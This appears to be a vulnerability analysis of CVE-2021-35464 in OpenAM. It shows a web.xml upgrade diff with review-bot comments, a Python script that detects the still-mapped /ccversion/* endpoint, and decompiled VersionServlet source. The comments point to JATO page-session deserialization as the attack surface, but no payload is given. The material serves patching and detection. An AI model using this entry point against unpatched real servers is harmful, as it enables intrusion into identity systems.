-	<servlet-mapping>
-    	<servlet-name>IntersiteTransferService</servlet-name>
-    	<url-pattern>/IntersiteTransferService</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>AssertionConsumerService</servlet-name>
-    	<url-pattern>/AssertionConsumerService/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SOAPReceiver</servlet-name>
-    	<url-pattern>/SOAPReceiver/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>FederationTerminationServlet</servlet-name>
-    	<url-pattern>/federation-terminate</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ProcessTermination</servlet-name>
-    	<url-pattern>/ProcessTermination/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ReturnTermination</servlet-name>
-    	<url-pattern>/ReturnTermination/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>InitiateRegistration</servlet-name>
-    	<url-pattern>/InitiateRegistration</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ProcessRegistration</servlet-name>
-    	<url-pattern>/ProcessRegistration/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ReturnRegistration</servlet-name>
-    	<url-pattern>/ReturnRegistration/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>WSSOAPReceiver</servlet-name>
-    	<url-pattern>/Liberty/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>WSPRedirectHandler</servlet-name>
-    	<url-pattern>/WSPRedirectHandler/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>idffwriter</servlet-name>
-    	<url-pattern>/idffwriter</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>idffreader</servlet-name>
-    	<url-pattern>/idffreader</url-pattern>
-	</servlet-mapping>
 	<servlet-mapping>
     	<servlet-name>saml2writer</servlet-name>
     	<url-pattern>/saml2writer</url-pattern>
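Review bot: the `<servlet>` declarations behind these removed Liberty ID-FF / WS-Federation mappings (FSAssertionManagerServlet, preLoginHandler, postLoginHandler, SOAPReceiver, WSSOAPReceiver, idffwriter and the rest) are not removed in any of the visible hunks; confirm the matching declarations are dropped as well, otherwise the new web.xml keeps dead declarations for the code paths this removal is meant to retire.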
@@ -1164,30 +796,6 @@

 	<!-- end of servlet mapping -->

-	<servlet>
-    	<servlet-name>WebFinger</servlet-name>
-    	<servlet-class>org.restlet.ext.servlet.ServerServlet</servlet-class>
-
-    	<!-- Your application class name (Optional - For mode 3) -->
-    	<init-param>
-        	<param-name>org.restlet.application</param-name>
-        	<param-value>org.forgerock.openidconnect.restlet.WebFinger</param-value>
-    	</init-param>
-
-    	<!-- List of supported client protocols (Optional - Only in mode 3) -->
-    	<init-param>
-        	<param-name>org.restlet.clients</param-name>
-        	<param-value>RIAP CLAP</param-value>
-    	</init-param>
-
-    	<!-- Add the Servlet context path to routes (Optional) -->
-    	<init-param>
-        	<param-name>org.restlet.autoWire</param-name>
-        	<param-value>true</param-value>
-    	</init-param>
-
-	</servlet>
-
 	<servlet>
     	<servlet-name>OAuth2RegisterClient</servlet-name>
     	<jsp-file>/oauth2/registerClient.jsp</jsp-file>
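Review bot: removing the Restlet-backed WebFinger servlet is only safe because `/.well-known/*` is re-mapped to the `OpenAM` servlet in a later hunk; that re-routing (WebFinger served by the HTTP framework servlet instead of `org.restlet.ext.servlet.ServerServlet` with `RIAP CLAP` client protocols) is not mentioned anywhere in the change and should be documented with the commit.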
@@ -1200,14 +808,9 @@

 	<!-- servlet declaration -->

-	<servlet-mapping>
-    	<servlet-name>WebFinger</servlet-name>
-    	<url-pattern>/.well-known/*</url-pattern>
-	</servlet-mapping>
-
 	<servlet>
     	<servlet-name>OpenAM</servlet-name>
-    	<servlet-class>org.forgerock.http.servlet.HttpFrameworkServlet</servlet-class>
+    	<servlet-class>org.forgerock.openam.http.OpenAMHttpFrameworkServlet</servlet-class>
     	<init-param>
         	<param-name>application-loader</param-name>
         	<param-value>guice</param-value>
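Review bot: the swap from `org.forgerock.http.servlet.HttpFrameworkServlet` to `org.forgerock.openam.http.OpenAMHttpFrameworkServlet` comes with no description of what the subclass changes, while this same servlet is about to front `/xacml/*`, `/oauth2/*`, `/uma/*` and `/.well-known/*` in addition to its existing mappings; the unchanged `application-loader` = `guice` init-param is fine, but the behavioural difference of the new class should be stated, since it is now the single entry point for all of those routes.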
@@ -1238,90 +841,22 @@
     	<servlet-name>OpenAM</servlet-name>
     	<url-pattern>/sts-tokengen/*</url-pattern>
 	</servlet-mapping>
-
-	<!-- Console -->
-	<servlet-mapping>
-    	<servlet-name>AuthServlet</servlet-name>
-    	<url-pattern>/authentication/*</url-pattern>
-	</servlet-mapping>
 	<servlet-mapping>
-    	<servlet-name>AMBaseServlet</servlet-name>
-    	<url-pattern>/base/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SCServlet</servlet-name>
-    	<url-pattern>/service/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SMServlet</servlet-name>
-    	<url-pattern>/session/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>RMServlet</servlet-name>
-    	<url-pattern>/realm/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>PMServlet</servlet-name>
-    	<url-pattern>/policy/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>IDMServlet</servlet-name>
-    	<url-pattern>/idm/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>UMServlet</servlet-name>
-    	<url-pattern>/user/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>DelegationServlet</servlet-name>
-    	<url-pattern>/delegation/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>TaskServlet</servlet-name>
-    	<url-pattern>/task/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>AgentConfigurationServlet</servlet-name>
-    	<url-pattern>/agentconfig/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>VersionServlet</servlet-name>
-    	<url-pattern>/ccversion/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>FSServlet</servlet-name>
-    	<url-pattern>/federation/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>WSServlet</servlet-name>
-    	<url-pattern>/webservices/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>STSServlet</servlet-name>
-    	<url-pattern>/sts/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>AuditServlet</servlet-name>
-    	<url-pattern>/audit/*</url-pattern>
-	</servlet-mapping>
-	<!-- End console -->
-
-	<servlet>
-    	<servlet-name>ForgeRockRest</servlet-name>
-    	<servlet-class>org.forgerock.openam.rest.RestEndpointServlet</servlet-class>
-	</servlet>
-	<servlet-mapping>
-    	<servlet-name>ForgeRockRest</servlet-name>
+    	<servlet-name>OpenAM</servlet-name>
     	<url-pattern>/xacml/*</url-pattern>
 	</servlet-mapping>
 	<servlet-mapping>
-    	<servlet-name>ForgeRockRest</servlet-name>
+    	<servlet-name>OpenAM</servlet-name>
     	<url-pattern>/oauth2/*</url-pattern>
 	</servlet-mapping>
 	<servlet-mapping>
-    	<servlet-name>ForgeRockRest</servlet-name>
+    	<servlet-name>OpenAM</servlet-name>
     	<url-pattern>/uma/*</url-pattern>
 	</servlet-mapping>
+	<servlet-mapping>
+    	<servlet-name>OpenAM</servlet-name>
+    	<url-pattern>/.well-known/*</url-pattern>
+	</servlet-mapping>

 	<!-- Setup favicon.ico extension type -->
 	<mime-mapping>
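Review bot: this hunk removes the `/ccversion/*` mapping to `VersionServlet` together with the other `com.sun.identity.console` mappings, but the `<servlet>` declarations for those names are only removed in the following hunk, so the two must ship as one change; a deployment that merged only this hunk would keep the console servlets declared but unmapped. The consolidation of the three `ForgeRockRest` mappings onto `OpenAM` is consistent with the removal of the `ForgeRockRest` `<servlet>` declaration in the same hunk.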
@@ -1335,106 +870,6 @@
     	</welcome-file>
 	</welcome-file-list>

-	<!-- The taglib is only specified once -->
-	<jsp-config>
-    	<taglib>
-        	<taglib-uri>/WEB-INF/jato.tld</taglib-uri>
-        	<taglib-location>/WEB-INF/jato.tld</taglib-location>
-    	</taglib>
-    	<taglib>
-        	<taglib-uri>/WEB-INF/cc.tld</taglib-uri>
-        	<taglib-location>/WEB-INF/com_sun_web_ui/cc.tld</taglib-location>
-    	</taglib>
-
-    	<!-- workarounds for lockart 2.x -->
-    	<taglib>
-        	<taglib-uri>/WEB-INF/tld/com_iplanet_jato/jato.tld</taglib-uri>
-        	<taglib-location>/WEB-INF/jato.tld</taglib-location>
-    	</taglib>
-    	<taglib>
-        	<taglib-uri>/WEB-INF/tld/com_sun_web_ui/cc.tld</taglib-uri>
-        	<taglib-location>/WEB-INF/com_sun_web_ui/cc.tld</taglib-location>
-    	</taglib>
-    	<!-- taglib definition -->
-	</jsp-config>
-	<!-- comment it out due to issue 4891 in WAS/JBOSS/Geronimo
-	<resource-ref>
-    	<description>mysql db idrepo</description>
-    	<res-ref-name>jdbc/openssousersdb</res-ref-name>
-    	<res-type>javax.sql.DataSource</res-type>
-    	<res-auth>Container</res-auth>
-    	<res-sharing-scope>Shareable</res-sharing-scope>
-	</resource-ref>
-	-->
-
-	<!-- Console -->
-	<servlet>
-    	<servlet-name>UMServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.user.UMServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>AuthServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.authentication.AuthServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>AMBaseServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.base.AMBaseServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>SCServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.service.SCServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>SMServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.session.SMServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>RMServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.realm.RMServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>PMServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.policy.PMServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>IDMServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.idm.IDMServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>DelegationServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.delegation.DelegationServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>AgentConfigurationServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.agentconfig.AgentConfigurationServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>TaskServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.task.TaskServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>VersionServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.version.VersionServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>FSServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.federation.FSServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>WSServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.webservices.WSServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>STSServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.sts.STSServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>AuditServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.audit.AuditServlet</servlet-class>
-	</servlet>
-
-	<!-- End console -->
-
 	<!-- Start errors -->
 	<error-page>
     	<error-code>404</error-code>
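Review bot: dropping the `jato.tld` and `cc.tld` entries from `<jsp-config>` alongside the console `<servlet>` declarations means any JSP still referencing those taglib URIs will fail to compile at first request; the removal of the console JSPs that used them is not visible in this diff and should accompany it. The deletion of the already commented-out `resource-ref` block is harmless cleanup.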

The ccversion endpoint was notably removed:

-	<servlet-mapping>
-    	<servlet-name>VersionServlet</servlet-name>
-    	<url-pattern>/ccversion/*</url-pattern>
-	</servlet-mapping>
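
As an added check that is not part of the Rapid7 analysis or of ForgeRock's code, the script below parses a deployed web.xml and reports any servlet-mapping still pointing at the legacy console servlets this diff removes, `/ccversion/*` in particular. The sample descriptor is constructed, and the namespace-agnostic tag matching is an assumption so that both namespaced and unnamespaced descriptors are handled.

```python
import xml.etree.ElementTree as ET

# Servlet names the upgrade diff above drops from the "Console" section of web.xml.
# VersionServlet is the one serving /ccversion/*, the JATO-backed endpoint behind CVE-2021-35464.
LEGACY_CONSOLE_SERVLETS = {
    "AuthServlet", "AMBaseServlet", "SCServlet", "SMServlet", "RMServlet",
    "PMServlet", "IDMServlet", "UMServlet", "DelegationServlet", "TaskServlet",
    "AgentConfigurationServlet", "VersionServlet", "FSServlet", "WSServlet",
    "STSServlet", "AuditServlet",
}

def _local(tag):
    """Drop a namespace prefix such as {http://java.sun.com/xml/ns/javaee} (assumed layout)."""
    return tag.rsplit("}", 1)[-1]

def _child_text(elem, name):
    """Text of the first direct child with the given local tag name, or None."""
    for child in elem:
        if _local(child.tag) == name and child.text:
            return child.text.strip()
    return None

def legacy_console_mappings(web_xml):
    """Return [(servlet-name, url-pattern)] for every mapping to a legacy console servlet."""
    root = ET.fromstring(web_xml)
    found = []
    for elem in root.iter():
        if _local(elem.tag) != "servlet-mapping":
            continue
        name = _child_text(elem, "servlet-name")
        if name in LEGACY_CONSOLE_SERVLETS:
            found.append((name, _child_text(elem, "url-pattern")))
    return found

def ccversion_exposed(web_xml):
    """True when the /ccversion/* mapping that the fix removed is still present."""
    return any(pattern == "/ccversion/*" for _, pattern in legacy_console_mappings(web_xml))

# Constructed sample, not a real deployment: a pre-fix style web.xml that keeps VersionServlet.
SAMPLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet-mapping>
    <servlet-name>OpenAM</servlet-name>
    <url-pattern>/oauth2/*</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>VersionServlet</servlet-name>
    <url-pattern>/ccversion/*</url-pattern>
  </servlet-mapping>
</web-app>"""
```

Run `legacy_console_mappings` over the WEB-INF/web.xml of a deployed instance; an empty result for a descriptor that matches the post-fix layout, and a `("VersionServlet", "/ccversion/*")` entry for one that does not.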

The original VersionServlet can be seen here:

package com.sun.identity.console.version;

import com.iplanet.jato.CompleteRequestException;
import com.iplanet.jato.RequestContext;
import com.iplanet.jato.RequestContextImpl;
import com.iplanet.jato.ViewBeanManager;
import com.iplanet.jato.view.ViewBean;
import com.sun.identity.console.base.AMViewBeanBase;
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;

// Decompiled from the OpenAM console. The superclass is the JATO-based
// com.sun.web.ui.servlet.version.VersionServlet, which shares this class's simple name,
// so it is referenced by its fully qualified name here.
public class VersionServlet extends com.sun.web.ui.servlet.version.VersionServlet {

  protected void initializeRequestContext(RequestContext requestContext) {
    super.initializeRequestContext(requestContext);
    // Point JATO at the view beans in this package (e.g. VersionViewBean).
    ViewBeanManager viewBeanManager = new ViewBeanManager(requestContext,
        getPackageName(VersionServlet.class.getName()));
    ((RequestContextImpl) requestContext).setViewBeanManager(viewBeanManager);
  }

  protected void onRequestHandlerNotFound(RequestContext requestContext, String handlerName)
      throws ServletException {
    AMViewBeanBase.debug.error("VersionServlet.onRequestHandlerNotFound: " + handlerName);
  }

  protected void onRequestHandlerNotSpecified(RequestContext requestContext)
      throws ServletException {
    AMViewBeanBase.debug.error("VersionServlet.onRequestHandlerNotSpecified");
  }

  // Any exception not handled elsewhere is logged and the client is sent to the
  // generic console error page.
  protected void onUncaughtException(RequestContext requestContext, Exception e)
      throws ServletException, IOException {
    HttpServletRequest httpRequest = requestContext.getRequest();
    AMViewBeanBase.debug.error("VersionServlet.onUncaughtException", e);
    String redirectUrl = VersionViewBean.getCurrentURL(httpRequest) + "/base/AMUncaughtException";
    requestContext.getResponse().sendRedirect(redirectUrl);
  }

  // Called when JATO fails to deserialize the page session carried in the request
  // (the jato.pageSession parameter). By the time this runs the deserialization attempt
  // has already taken place; the handler only logs (under the label the original source
  // reuses from onUncaughtException), redirects, and ends the request.
  protected void onPageSessionDeserializationException(RequestContext requestContext,
      ViewBean viewBean, Exception e) throws ServletException, IOException {
    HttpServletRequest httpRequest = requestContext.getRequest();
    AMViewBeanBase.debug.error("VersionServlet.onUncaughtException", e);
    String redirectUrl = VersionViewBean.getCurrentURL(httpRequest) + "/base/AMInvalidURL";
    requestContext.getResponse().sendRedirect(redirectUrl);
    throw new CompleteRequestException();
  }

  protected void onSessionTimeout(RequestContext requestContext) throws ServletException {}
}

More details can be found in the PortSwigger writeup.
